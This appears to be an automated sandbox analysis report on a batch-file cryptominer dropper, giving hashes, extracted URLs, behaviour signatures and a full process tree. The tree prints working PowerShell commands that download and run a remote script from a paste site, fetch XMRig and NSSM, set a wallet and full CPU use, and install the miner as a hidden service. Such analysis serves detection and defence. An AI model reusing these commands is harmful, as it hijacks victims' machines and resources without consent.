Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 03:55

General

  • Target

    14586180115420.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 17 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 3 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 64 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\14586180115420.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3846.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4648
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2040
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:5052
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:3432
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:4352
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:1516
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:2712
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:3776
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:1636
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:3840
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:332
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4920
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1128
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:528
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                      • Executes dropped EXE
                      PID:1824
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1488
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1276
                        • C:\Windows\system32\HOSTNAME.EXE
                          "C:\Windows\system32\HOSTNAME.EXE"
                          6⤵
                            PID:3080
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4332
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1832
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Tmuacblb\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1516
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4716
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4652
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2772
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4032
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4608
                      • C:\Windows\system32\sc.exe
                        sc stop moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:3632
                      • C:\Windows\system32\sc.exe
                        sc delete moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:3032
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:4392
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                        4⤵
                        • Executes dropped EXE
                        PID:1496
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                        4⤵
                        • Executes dropped EXE
                        PID:1860
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                        4⤵
                        • Executes dropped EXE
                        PID:1856
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                        4⤵
                        • Executes dropped EXE
                        PID:4572
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                        4⤵
                        • Executes dropped EXE
                        PID:3776
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                    2⤵
                      PID:920
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic cpu get loadpercentage
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1240
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:1128
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                      2⤵
                        PID:2436
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic cpu get loadpercentage
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1348
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:4160
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                        2⤵
                          PID:3016
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic cpu get loadpercentage
                            3⤵
                              PID:5108
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            2⤵
                            • Delays execution with timeout.exe
                            PID:3912
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                            2⤵
                              PID:3308
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic cpu get loadpercentage
                                3⤵
                                  PID:2200
                              • C:\Windows\system32\timeout.exe
                                timeout /t 1
                                2⤵
                                • Delays execution with timeout.exe
                                PID:3932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                2⤵
                                  PID:4444
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic cpu get loadpercentage
                                    3⤵
                                      PID:3316
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 1
                                    2⤵
                                    • Delays execution with timeout.exe
                                    PID:3140
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                    2⤵
                                      PID:872
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic cpu get loadpercentage
                                        3⤵
                                          PID:4996
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:4424
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:1388
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:3432
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:3288
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:4212
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:4804
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:4656
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:1096
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:1524
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:2144
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:3352
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:1708
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:3496
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:1704
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:4208
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                              PID:1240
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                              2⤵
                                                                PID:4236
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic cpu get loadpercentage
                                                                  3⤵
                                                                    PID:448
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 1
                                                                  2⤵
                                                                    PID:5088
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                    2⤵
                                                                      PID:3276
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic cpu get loadpercentage
                                                                        3⤵
                                                                          PID:4916
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 1
                                                                        2⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:3968
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                        2⤵
                                                                          PID:1640
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic cpu get loadpercentage
                                                                            3⤵
                                                                              PID:3912
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            2⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:4460
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                            2⤵
                                                                              PID:4084
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic cpu get loadpercentage
                                                                                3⤵
                                                                                  PID:3308
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                2⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1540
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                2⤵
                                                                                  PID:4032
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic cpu get loadpercentage
                                                                                    3⤵
                                                                                      PID:2876
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 1
                                                                                    2⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:516
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                    2⤵
                                                                                      PID:2740
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic cpu get loadpercentage
                                                                                        3⤵
                                                                                          PID:1488
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        2⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4424
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                        2⤵
                                                                                          PID:232
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic cpu get loadpercentage
                                                                                            3⤵
                                                                                              PID:4132
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            2⤵
                                                                                              PID:5056
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                              2⤵
                                                                                                PID:1860
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic cpu get loadpercentage
                                                                                                  3⤵
                                                                                                    PID:1372
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 1
                                                                                                  2⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:5044
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                  2⤵
                                                                                                    PID:1832
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic cpu get loadpercentage
                                                                                                      3⤵
                                                                                                        PID:4656
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout /t 1
                                                                                                      2⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:4568
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                      2⤵
                                                                                                        PID:2488
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic cpu get loadpercentage
                                                                                                          3⤵
                                                                                                            PID:2652
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout /t 1
                                                                                                          2⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:3776
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                          2⤵
                                                                                                            PID:2416
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic cpu get loadpercentage
                                                                                                              3⤵
                                                                                                                PID:3496
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 1
                                                                                                              2⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:1716
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                              2⤵
                                                                                                                PID:3492
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic cpu get loadpercentage
                                                                                                                  3⤵
                                                                                                                    PID:2468
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout /t 1
                                                                                                                  2⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:2960
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                  2⤵
                                                                                                                    PID:4660
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic cpu get loadpercentage
                                                                                                                      3⤵
                                                                                                                        PID:1564
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      timeout /t 1
                                                                                                                      2⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:2204
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                      2⤵
                                                                                                                        PID:4236
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic cpu get loadpercentage
                                                                                                                          3⤵
                                                                                                                            PID:4860
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 1
                                                                                                                          2⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1156
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                          2⤵
                                                                                                                            PID:3100
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic cpu get loadpercentage
                                                                                                                              3⤵
                                                                                                                                PID:3084
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 1
                                                                                                                              2⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:3276
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                              2⤵
                                                                                                                                PID:1324
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                  3⤵
                                                                                                                                    PID:1244
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout /t 1
                                                                                                                                  2⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:2584
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                  2⤵
                                                                                                                                    PID:1928
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                      3⤵
                                                                                                                                        PID:3224
                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                      timeout /t 1
                                                                                                                                      2⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:3444
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                      2⤵
                                                                                                                                        PID:4892
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                          3⤵
                                                                                                                                            PID:4084
                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                          timeout /t 1
                                                                                                                                          2⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:756
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                          2⤵
                                                                                                                                            PID:3360
                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                              3⤵
                                                                                                                                                PID:2876
                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                              timeout /t 1
                                                                                                                                              2⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4884
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                              2⤵
                                                                                                                                                PID:5084
                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                  3⤵
                                                                                                                                                    PID:872
                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                  timeout /t 1
                                                                                                                                                  2⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:2060
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2040
                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4392
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 1
                                                                                                                                                      2⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:3432
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2788
                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1472
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 1
                                                                                                                                                          2⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:4292
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4212
                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1516
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              timeout /t 1
                                                                                                                                                              2⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:4944
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4568
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2104
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:3840
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4108
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1848
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      timeout /t 1
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:3496
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1548
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4808
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 1
